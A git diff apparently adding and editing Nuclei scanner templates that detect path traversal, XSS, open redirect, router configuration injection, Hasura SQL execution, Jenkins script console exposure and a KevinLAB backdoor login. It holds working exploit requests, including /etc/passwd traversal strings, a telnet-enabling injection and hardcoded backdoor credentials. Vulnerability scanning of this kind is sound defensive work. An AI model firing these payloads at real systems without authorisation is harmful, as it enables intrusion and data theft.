+ - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
+ - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
+ - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
+ - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
+ - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
+ - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+ - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+ - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
matchers:
- type: regex
words:
diff --git a/vulnerabilities/generic/generic-windows-lfi.yaml b/vulnerabilities/generic/generic-windows-lfi.yaml
new file mode 100644
index 0000000000..1e77b5937b
--- /dev/null
+++ b/vulnerabilities/generic/generic-windows-lfi.yaml
@@ -0,0 +1,31 @@
+id: generic-windows-lfi
+
+info:
+ name: Generic Windows based LFI Test
+ author: mesaglio,sushantkamble
+ severity: high
+ description: Searches for /windows/win.ini on passed URLs
+ tags: azure,windows,lfi,generic
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
+ - "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
+ - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
+ - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
+ - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
+ - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
+ - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+ - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+ - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+ - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml
index a831248bd0..7941072763 100644
--- a/vulnerabilities/generic/open-redirect.yaml
+++ b/vulnerabilities/generic/open-redirect.yaml
@@ -5,7 +5,7 @@ info:
author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
severity: low
description: A user-controlled input redirect users to an external website.
- tags: redirect
+ tags: redirect,generic
requests:
- method: GET
diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml
index 49ca980a02..d243903673 100644
--- a/vulnerabilities/generic/top-xss-params.yaml
+++ b/vulnerabilities/generic/top-xss-params.yaml
@@ -5,7 +5,7 @@ info:
author: foulenzer,geeknik
severity: medium
description: Searches for reflected XSS in the server response via GET-requests.
- tags: xss
+ tags: xss,generic
additional-fields:
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p
diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml
new file mode 100644
index 0000000000..2d2d073fe6
--- /dev/null
+++ b/vulnerabilities/jenkins/jenkins-script.yaml
@@ -0,0 +1,23 @@
+id: jenkins-script
+
+info:
+ name: Jenkins RCE due to accesible script functionality
+ author: philippedelteil
+ severity: critical
+ reference: https://hackerone.com/reports/403402
+ tags: jenkins,rce,devops
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/script/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "println(Jenkins.instance.pluginManager.plugins)"
+ - "Scriptconsole"
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
index 91d022d54e..8941ffc298 100644
--- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml
+++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
@@ -1,4 +1,4 @@
-id: jenkins-stack-traces
+id: jenkins-stack-trace
info:
name: Detect Jenkins in Debug Mode with Stack Traces Enabled
diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml
new file mode 100644
index 0000000000..19e3bc099e
--- /dev/null
+++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml
@@ -0,0 +1,28 @@
+id: oracle-siebel-xss
+
+info:
+ name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
+ author: dhiyaneshDK
+ severity: medium
+ reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
+ tags: xss,oracle
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml
new file mode 100644
index 0000000000..dfde5d648f
--- /dev/null
+++ b/vulnerabilities/other/bems-api-lfi.yaml
@@ -0,0 +1,24 @@
+id: bems-api-lfi
+
+info:
+ name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
+ author: gy741
+ severity: high
+ description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
+ tags: lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml
new file mode 100644
index 0000000000..caeb3dd6c3
--- /dev/null
+++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml
@@ -0,0 +1,28 @@
+id: beward-ipcamera-disclosure
+
+info:
+ name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure
+ author: geeknik
+ severity: high
+ description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API.
+ reference: |
+ - https://www.exploit-db.com/exploits/46320
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
+ tags: iot,camera,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd"
+ headers:
+ Authorization: "Basic YWRtaW46YWRtaW4="
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - 'root:[x*]:0:0:'
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml
new file mode 100644
index 0000000000..8dec57680f
--- /dev/null
+++ b/vulnerabilities/other/buffalo-config-injection.yaml
@@ -0,0 +1,34 @@
+id: buffalo-config-injection
+
+info:
+ name: Buffalo WSR-2533DHPL2 - Configuration File Injection
+ author: gy741
+ severity: critical
+ description: |
+ The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
+ reference: |
+ - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ tags: buffalo,firmware,iot
+
+requests:
+ - raw:
+ - |
+ POST /images/..%2fapply_abstract.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+
+ action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A
+ ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "/Success.htm"
+
+ - type: status
+ status:
+ - 302
\ No newline at end of file
diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml
index 240be6a9cd..2207ee9960 100644
--- a/vulnerabilities/other/coldfusion-debug-xss.yaml
+++ b/vulnerabilities/other/coldfusion-debug-xss.yaml
@@ -4,6 +4,7 @@ info:
name: Adobe ColdFusion Debug Page XSS
author: dhiyaneshDK
severity: medium
+ description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
tags: adobe,coldfusion,xss
diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
new file mode 100644
index 0000000000..e83d14ce2c
--- /dev/null
+++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
@@ -0,0 +1,30 @@
+id: ewebs-arbitrary-file-reading
+
+info:
+ name: EWEBS casmain.xgi arbitrary file reading vulnerability
+ author: pikpikcu
+ severity: high
+ reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
+ tags: ewebs,lfi
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/casmain.xgi'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ body: "Language_S=../../Data/CONFIG/CasDbCnn.dat"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "[Edition]"
+ - "[LocalInfo]"
+ condition: and
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml
new file mode 100644
index 0000000000..7e05dfc26c
--- /dev/null
+++ b/vulnerabilities/other/eyelock-nano-lfd.yaml
@@ -0,0 +1,24 @@
+id: eyelock-nano-lfd
+
+info:
+ name: EyeLock nano NXT 3.5 - Local File Disclosure
+ author: geeknik
+ severity: high
+ description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
+ reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
+ tags: iot,lfi,eyelock
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
new file mode 100644
index 0000000000..8e4768db23
--- /dev/null
+++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
@@ -0,0 +1,29 @@
+id: geowebserver-lfi
+
+info:
+ name: GeoVision Geowebserver 5.3.3 - LFI
+ author: madrobot
+ severity: high
+ reference: https://www.exploit-db.com/exploits/50211
+ tags: geowebserver,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
+ - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml
new file mode 100644
index 0000000000..c5e0e08aeb
--- /dev/null
+++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml
@@ -0,0 +1,33 @@
+id: geowebserver-xss
+
+info:
+ name: GeoVision Geowebserver 5.3.3 - XSS
+ author: madrobot
+ severity: medium
+ reference: https://www.exploit-db.com/exploits/50211
+ tags: geowebserver,xss
+
+requests:
+ - raw:
+ - |
+ GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+ Accept: */*
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - ""
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
new file mode 100644
index 0000000000..98bcfbc283
--- /dev/null
+++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
@@ -0,0 +1,37 @@
+id: hasura-graphql-psql-exec
+
+info:
+ author: Udyz
+ name: Hasura GraphQL Engine - postgresql query exec
+ severity: critical
+ reference: https://www.exploit-db.com/exploits/49802
+ tags: hasura,rce
+
+requests:
+ - raw:
+ - |
+ POST /v2/query HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {
+ "type": "bulk",
+ "source": "default",
+ "args":[
+ {
+ "type": "run_sql",
+ "args": {
+ "source":"default",
+ "sql":"SELECT pg_read_file('/etc/passwd',0,100000);",
+ "cascade": false,
+ "read_only": false
+ }
+ }
+ ]
+ }
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml
index fc77816080..f54c005b18 100644
--- a/vulnerabilities/other/hasura-graphql-ssrf.yaml
+++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml
@@ -4,7 +4,7 @@ info:
author: princechaddha
severity: high
reference: https://cxsecurity.com/issue/WLB-2021040115
- tags: hasura
+ tags: hasura,ssrf
requests:
- raw:
diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
new file mode 100644
index 0000000000..ea925ce800
--- /dev/null
+++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
@@ -0,0 +1,41 @@
+id: kevinlab-hems-backdoor
+
+info:
+ name: KevinLAB HEMS Undocumented Backdoor Account
+ author: gy741
+ severity: critical
+ description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
+ tags: kevinlab,default-login,backdoor
+
+requests:
+ - raw:
+ - |
+ POST /dashboard/proc.php?type=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Accept-Encoding: gzip, deflate
+ Connection: close
+
+ userid=kevinlab&userpass=kevin003
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ''
+
+ - type: word
+ words:
+ - '"
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml b/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml
new file mode 100644
index 0000000000..b8089bf787
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml
@@ -0,0 +1,20 @@
+id: wp-grimag-open-redirect
+
+info:
+ name: WordPress Grimag Themes < 1.1.1 Open Redirection
+ author: 0x_Akoko
+ description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability.
+ reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a
+ severity: low
+ tags: wordpress,wp-theme,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml b/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml
new file mode 100644
index 0000000000..9916d6c3f2
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml
@@ -0,0 +1,20 @@
+id: wp-prostore-open-redirect
+
+info:
+ name: WordPress ProStore Themes 1.1.2 Open Redirection
+ author: 0x_Akoko
+ description: The prostore WordPress theme was affected by an Open Redirection security vulnerability.
+ reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc
+ severity: low
+ tags: wordpress,wp-theme,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml
new file mode 100644
index 0000000000..8539ff6058
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@@ -0,0 +1,29 @@
+id: wordpress-upload-data
+
+info:
+ name: wordpress-upload-data
+ author: pussycat0x
+ severity: medium
+ description: Searches for Passwords in the wordpress uploads directory.
+ reference: https://www.exploit-db.com/ghdb/7040
+ tags: wordpress,listing
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/data.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "admin:"
+
+ - type: word
+ part: header
+ words:
+ - "text/plain"
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
new file mode 100644
index 0000000000..6ca5d17599
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
@@ -0,0 +1,31 @@
+id: wp-woocommerce-pdf-invoice-listing
+
+info:
+ name: WordPress Upload Fuzzing
+ author: mohammedsaneem,sec_hawk
+ severity: medium
+ description: Allows attacker to view sensitive information such as company invoices
+ reference: |
+ - https://twitter.com/sec_hawk/status/1426984595094913025?s=21
+ - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
+ - https://woocommerce.com/products/pdf-invoices/
+ tags: wordpress,listing,exposure
+
+requests:
+
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/pdf-invoices/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of /wp-content/uploads/pdf-invoices"
+ - "Parent Directory"
+ - ".pdf"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml
new file mode 100644
index 0000000000..ae922a4ec9
--- /dev/null
+++ b/workflows/azkaban-workflow.yaml
@@ -0,0 +1,13 @@
+id: azkaban-workflow
+
+info:
+ name: Azkaban Security Checks
+ author: pdteam
+ description: A simple workflow that runs all azkaban related nuclei templates on a given target.
+ tags: workflow
+
+workflows:
+
+ - template: exposed-panels/azkaban-web-client.yaml
+ subtemplates:
+ - template: default-logins/azkaban/azkaban-web-client-defaulr-creds.yaml
\ No newline at end of file